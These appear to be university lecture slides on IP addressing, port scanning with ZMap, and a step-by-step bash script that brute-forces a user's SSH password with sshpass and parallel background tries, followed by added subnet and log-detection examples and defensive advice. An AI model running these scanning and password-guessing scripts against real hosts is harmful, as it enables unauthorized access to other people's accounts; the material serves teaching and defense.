Network Security In Linux: Scanning and Hacking

Review
    Lex: a lexical analyzer that tokenizes an input text.
    Yacc: a parser that parses and acts based on defined grammar rules involving tokens.
    How to compile Lex and Yacc source files into an executable file.

Outline
    A naïve way to hack
    Background: IP networks, TCP protocols
    Network scanning
    A script for repeated SSH login attempts

Background
    Internet: a set of inter-connected networks that largely rely on the TCP/IP protocol suite.
    IP (Internet Protocol): provides an address for routing information; data is segmented into packets.
    TCP (Transmission Control Protocol): runs over IP and controls how IP packets are transmitted; port numbers differentiate services.

IP
    Responsible for end-to-end transmission.
    Sends data in individual packets; the maximum packet size is determined by the networks traversed, and a packet is fragmented if it is too large.
    Unreliable: packets might be lost, corrupted, duplicated, or delivered out of order.

IP address
    An IPv4 address is 4 bytes, e.g. 141.225.9.148 (csa.memphis.edu). Each device normally gets one; in theory there are about 4 billion available.
    A subnet is written as a 4-byte IP followed by /[0~32] and represents a range of IP addresses, e.g. 141.225.8.1/22, a subnet at UofM that includes the computers in Dunn Hall.
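The slash notation above is easier to reason about once you can see which addresses a prefix covers. The following added example (not part of the lecture) uses Python's standard ipaddress module to expand the subnet quoted on the slide, 141.225.8.1/22, into its network address, broadcast address and address count, and to test whether a given host such as csa.memphis.edu falls inside it.

```python
"""Expand CIDR subnet notation into its address range.

Added example, not part of the original lecture. Uses only the standard
library; 141.225.8.1/22 and 141.225.9.148 are the values quoted on the slides.
"""
import ipaddress


def subnet_info(cidr: str) -> dict:
    """Return network, broadcast, prefix length and address count for a CIDR string.

    strict=False lets a host address such as 141.225.8.1/22 stand for its
    enclosing network (141.225.8.0/22), which is how the slide writes it.
    """
    net = ipaddress.ip_network(cidr, strict=False)
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "prefixlen": net.prefixlen,
        "addresses": net.num_addresses,      # 2 ** (32 - prefixlen) for IPv4
        "first_host": str(net[1]),           # first usable host address
        "last_host": str(net[-2]),           # last usable host address
    }


def contains(cidr: str, address: str) -> bool:
    """True if `address` lies inside the subnet `cidr`."""
    return ipaddress.ip_address(address) in ipaddress.ip_network(cidr, strict=False)


if __name__ == "__main__":
    for cidr in ("141.225.8.1/22", "141.225.9.1/24"):
        print(cidr, subnet_info(cidr))
    print(contains("141.225.8.1/22", "141.225.9.148"))   # csa.memphis.edu is in the /22
```

A /22 covers 1024 addresses (141.225.8.0 through 141.225.11.255), so the slide's example subnet contains the /24 used in the later ZMap examples.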

TCP port number
    A port number is an application-specific software construct serving as a communications endpoint in a computer's host operating system.
    2 bytes: 0 ~ 65535. Used to differentiate services.
    Examples: 21 FTP, 22 SSH, 23 Telnet, 80 HTTP, 443 HTTPS

How to connect to a machine
    You have an IP address and you know which service you want.
    Surfing the web: send packets to the destination IP with port number 80.
    SSH login: send packets to the destination IP with port number 22.
    Then wait for the data sent back.

Potential risks
    As long as your machine has an IP address and is connected to the Internet, everyone can try to log in to it: FTP login, SSH login (our focus here), Telnet login, PHP login, MySQL login.

How to SSH log in to a machine
    Steps: you need to know that the machine runs an SSH service; you need a username and a password; then connect to the destination IP on port 22.
    Example: ssh comp4272@csa.memphis.edu
    The computer will create a packet consisting of the IP of csa.memphis.edu (141.225.9.148), the port number of SSH (22), and the username (comp4272).

Check if a machine supports SSH
    Port scanning: scan a subnet or the whole Internet to see which machines accept connections on the SSH port.
    Implementation: send a TCP connection request (SYN) to an IP on port 22 and test whether there is a response.

Scanning tool in Linux: ZMap
    A very recent tool, released in 2013. https://zmap.io/
    Installation: download the source, compile and install (https://github.com/zmap/zmap), or on Ubuntu/Mint: apt-get install zmap

ZMap feature: fast. It can port scan the entire IPv4 address space from just one machine in under 1 hour.

Speed of ZMap vs Nmap (chart from the ZMap authors' slides: averages for scanning 1 million random hosts)

Internet-wide results by ZMap (1): finding vulnerabilities
    UPnP vulnerability disclosed by HD Moore, Jan 29 2013. Scan results in February: 15.7 million publicly accessible UPnP devices, of which 3.4 million (~22%) were still vulnerable.

Internet-wide results by ZMap (2): finding service availability
    Outages during Hurricane Sandy, Oct-Nov 2012: more than a 30% decrease in reachable hosts (from the ZMap authors' slides).

Is port scanning legal?
    DoS attacks: definitely break the law.
    Hacking into someone's computer: definitely breaks the law.
    Port scanning: a gray area, and most likely prohibited by your ISP. Detection systems can block port scans.

Responses to ZMap scans
    Over 200 Internet-wide scans, the authors received requests to exclude 3,753,899 addresses (~0.11% of the IP address space). From the ZMap authors' slides.

ZMap for our use
    zmap -p [port] [IP]/[mask] -i [device] -o [file]
        -p: specify a port number
        -i: can be omitted if you have just one network device
        -o: output all found IPs into a file
    Example:
        zmap -p 22 141.225.8.1/22 -i eth1
        zmap -p 22 141.225.9.1/24 -i eth1

Exercise: do a port scan. Scan subnet 141.225.8.1/22 on port 80, and then on port 22.

Mission
    Suppose Tom has an account at a remote host, csa.memphis.edu, with username tom. The password is unknown, but consists only of digits.
    Task: write a shell script to get the password.

How to guess a password
    Create a dictionary and try all passwords in it one by one.
    How to create a dictionary: non-trivial. Social engineering: what is the user's name? The user's birthday? The user's nickname?

Guidelines to create a dictionary (some common things about our passwords)
    People tend to write letters first, then numbers.
    People tend to write special characters (!, *, @, #, $, %) last.
    People tend to use birthdays, phone numbers, street numbers, zip codes.
    Some people tend to use only numbers.
    Many people don't like uppercase, or put the uppercase letter first.

A password with only numbers
    DON'T use a password that contains only numbers!
    Create a dictionary that contains all combinations of digits and try them one by one.
    #dict.txt
    0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

Try password
    We can manually try the passwords in the dictionary one by one, or we can write a shell script to try all of them.
    (diagram: dict.txt with 0 1 2 ... 22, fed to ssh on port 22 towards csa.memphis.edu as user tom)

sshpass command
    ssh does not support automatic password entry: with ssh tom@csa.memphis.edu you always need to type the password manually.
    sshpass: supplies the password on the command line.
    Ubuntu/Mint install: apt-get install sshpass
    Usage: sshpass -p [password] [original ssh command]

sshpass example
    sshpass -p "12812" ssh tom@csa.memphis.edu
    If it succeeds, it logs in. Otherwise it says: Permission denied, please try again.
    Try more:
    sshpass -p "11111" ssh admin@csa.memphis.edu
    sshpass -p "comp4272" ssh comp4272@csa.memphis.edu

Write a shell script trypassword
    The arguments of the script are: first, the IP; second, the username; third, the password.
    Example: ./trypassword csa.memphis.edu tom 1
    The script tells you whether the login is successful.

trypassword script
    #!/bin/bash
    # $1 - ip address to hack
    # $2 - username
    # $3 - password
    sshpass -p "$3" ssh $2@$1 &> /dev/null
    if [ $? -eq 0 ]; then
        echo "Find the password: $3"
        exit 0
    fi
    exit 1
Any issue? (When the password is right, ssh opens an interactive session and the script never gets past that line.)
/dev/null is a device file that discards all data written to it: http://en.wikipedia.org/wiki/Null_device

The correct script (the remote shell is handed an exit command on standard input, so ssh returns as soon as the login succeeds)
    #!/bin/bash
    # $1 - ip address to hack
    # $2 - username
    # $3 - password
    echo exit | sshpass -p "$3" ssh $2@$1 &> /dev/null
    if [ $? -eq 0 ]; then
        echo "Find the password: $3"
        exit 0
    fi
    exit 1

Put trypassword in a loop
    trypassword offers one try. Our objective: try every password in the dictionary. Put trypassword in a loop; each time we try a different password, until we find the correct one. Create a script runhacking.

runhacking script
    #!/bin/bash
    ip=csa.memphis.edu
    username=tom
    dict=dict.txt
    for password in `cat $dict`; do
        echo "Try password: $password"
        ./trypassword $ip $username $password
        if [ $? -eq 0 ]; then
            exit 0
        fi
    done
    exit 1
Any issue? Are we done?

Speed up the process
    The runhacking script above runs ./trypassword synchronously: on every iteration it hangs there and waits for the server's result before starting the next try.

Our current strategy (diagram: server time vs. hacker time, one try at a time, each waiting for the previous response)

A better strategy (diagram: server time vs. hacker time, tries overlapped so the hacker does not wait between them)

The new runhacking script
    #!/bin/bash
    ip=csa.memphis.edu
    username=tom
    dict=dict.txt
    for password in `cat $dict`; do
        echo "Try password: $password"
        ./trypassword $ip $username $password &
        if [ $? -eq 0 ]; then
            exit 0
        fi
    done
    exit 1
& makes the command run in the background (a separate process is created to run it). But then $? is always 0, because it reports that the background process was started, not whether the login succeeded. How to handle this?

How to track status (diagram: runhacking launches several ./trypassword processes in parallel)
    How can the runhacking script know that a particular process found the password? There are multiple ways.

If the password is found, create a file
    #!/bin/bash
    # trypassword script:
    # $1 - ip address to hack
    # $2 - username
    # $3 - password
    # $4 - the filename to save the found password
    echo "exit" | sshpass -p "$3" ssh $2@$1 &> /dev/null
    if [ $? -eq 0 ]; then
        echo "Find the password: $3"
        echo $3 > $4
        exit 0
    fi
    exit 1

The final runhacking script
    #!/bin/bash
    ip=csa.memphis.edu
    username=tom
    dict=dict.txt
    pwfile=password
    rm -f $pwfile
    for password in `cat $dict`; do
        # If the password file has been created, a background try found it: exit
        if [ -f $pwfile ]; then
            exit 0
        fi
        echo "Try password: $password"
        ./trypassword $ip $username $password $pwfile &
    done
    exit 1

Discussions
    Hacking is ILLEGAL! Running this script against someone else's computer is illegal, and that computer can keep a record of your IP address and trace you back.
    You can try the script on csa.memphis.edu.
    How to prevent this very naïve hacking?
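From the server's side, the loop above is easy to see: every failed guess is one "Failed password" line from sshd, all from the same source address within a few seconds. The following added example (not part of the lecture) parses a few constructed /var/log/auth.log style lines, counts failures per source inside a sliding time window, and reports sources that exceed a threshold, together with any account that such a source later logged into. The threshold (5 failures within 60 seconds) and the log lines are assumptions for the example; this is the logic tools such as fail2ban apply before blocking the source.

```python
"""Spot repeated SSH password guessing in sshd log lines.

Added example, not part of the original lecture. SAMPLE_LOG is constructed
to resemble OpenSSH entries in /var/log/auth.log; the 203.0.113.0/24 and
192.0.2.0/24 addresses are documentation ranges, not real hosts. The
threshold and window are assumed values.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: one source trying digit passwords for "tom" and finally
# getting in, and one legitimate user who mistypes once, then uses a key.
SAMPLE_LOG = """\
Mar  3 10:00:01 csa sshd[4101]: Failed password for tom from 203.0.113.7 port 50211 ssh2
Mar  3 10:00:02 csa sshd[4103]: Failed password for tom from 203.0.113.7 port 50212 ssh2
Mar  3 10:00:02 csa sshd[4105]: Failed password for tom from 203.0.113.7 port 50213 ssh2
Mar  3 10:00:03 csa sshd[4107]: Failed password for tom from 203.0.113.7 port 50214 ssh2
Mar  3 10:00:03 csa sshd[4109]: Failed password for tom from 203.0.113.7 port 50215 ssh2
Mar  3 10:00:04 csa sshd[4111]: Accepted password for tom from 203.0.113.7 port 50216 ssh2
Mar  3 10:00:09 csa sshd[4120]: Failed password for comp4272 from 192.0.2.44 port 40001 ssh2
Mar  3 10:00:20 csa sshd[4122]: Accepted publickey for comp4272 from 192.0.2.44 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse(log_text: str, year: int = 2015):
    """Yield (timestamp, result, user, ip) for each sshd auth line; other lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())          # collapse syslog's padded day field
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["ip"]


def find_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> dict:
    """Return {ip: total_failures} for sources with >= threshold failures inside any window_s span."""
    failures = defaultdict(list)
    for ts, result, _user, ip in parse(log_text):
        if result == "Failed":
            failures[ip].append(ts)
    flagged = {}
    for ip, stamps in failures.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # slide the window start forward until it fits within window_s
            while (stamps[end] - stamps[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def success_after_failures(log_text: str, flagged: dict) -> list:
    """Return (ip, user) pairs where a flagged source later logged in: the guessing worked."""
    return [(ip, user) for _ts, result, user, ip in parse(log_text)
            if result == "Accepted" and ip in flagged]


if __name__ == "__main__":
    bad = find_bruteforce(SAMPLE_LOG)
    print("sources to block:", bad)
    print("accounts to reset:", success_after_failures(SAMPLE_LOG, bad))
```

Detection answers only half of the question on the slide. The guessing loop depends on password authentication being available at all, so setting PasswordAuthentication no in sshd_config and using keys removes the attack surface; MaxAuthTries and a rate limit or fail2ban-style ban on the flagged sources slow down whatever remains, and the "Accepted" line from a flagged source is the signal to reset that account.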

Summary
    TCP/IP networks: IP address and TCP port
    ZMap: a very fast Internet scanner
    A naïve script to try passwords
    Hacking is ILLEGAL!
    How to defend?